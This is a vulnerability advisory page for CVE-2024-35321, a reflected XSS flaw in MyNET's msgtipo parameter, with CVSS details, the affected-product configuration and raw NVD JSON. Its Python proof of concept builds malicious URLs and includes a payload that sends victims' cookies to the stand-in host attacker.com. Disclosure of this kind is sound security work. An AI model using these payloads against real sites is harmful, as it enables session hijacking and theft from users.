Security Vulnerability Report
中文
CVE-2024-35321 CVSS 4.3 MEDIUM

CVE-2024-35321

Published: 2025-12-22 19:15:48
Last Modified: 2026-01-05 17:50:18

Description

MyNET up to v26.08 was discovered to contain a Reflected cross-site scripting (XSS) vulnerability via the msgtipo parameter.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:* - VULNERABLE
MyNET < v26.08
MyNET up to v26.08

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-35321 Reflected XSS PoC # Target: MyNET <= v26.08 # Attack Vector: msgtipo parameter import urllib.parse # Malicious payload for reflected XSS payload = "<script>alert('XSS')</script>" encoded_payload = urllib.parse.quote(payload) # Construct malicious URL target_url = "http://[TARGET_HOST]/[MYNET_PATH]/" malicious_url = f"{target_url}?msgtipo={encoded_payload}" print("[*] CVE-2024-35321 Reflected XSS PoC") print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") # Alternative payload for cookie stealing cookie_stealer_payload = '<script>document.location="http://attacker.com/steal?c="+document.cookie</script>' print(f"[*] Cookie Stealer URL: {target_url}?msgtipo={urllib.parse.quote(cookie_stealer_payload)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-35321", "sourceIdentifier": "[email protected]", "published": "2025-12-22T19:15:48.393", "lastModified": "2026-01-05T17:50:18.217", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyNET up to v26.08 was discovered to contain a Reflected cross-site scripting (XSS) vulnerability via the msgtipo parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.08", "matchCriteriaId": "0F0C1BF8-3346-4D0E-9AA9-1B8CD5E98597"}]}]}], "references": [{"url": "https://github.com/Manuel-arc/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://github.com/am0nt31r0/Common-Vulnerabilities-and-Exposures-CVE-/blob/main/MyNet.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN", "source": "[email protected]", "tags": ["Product"]}]}}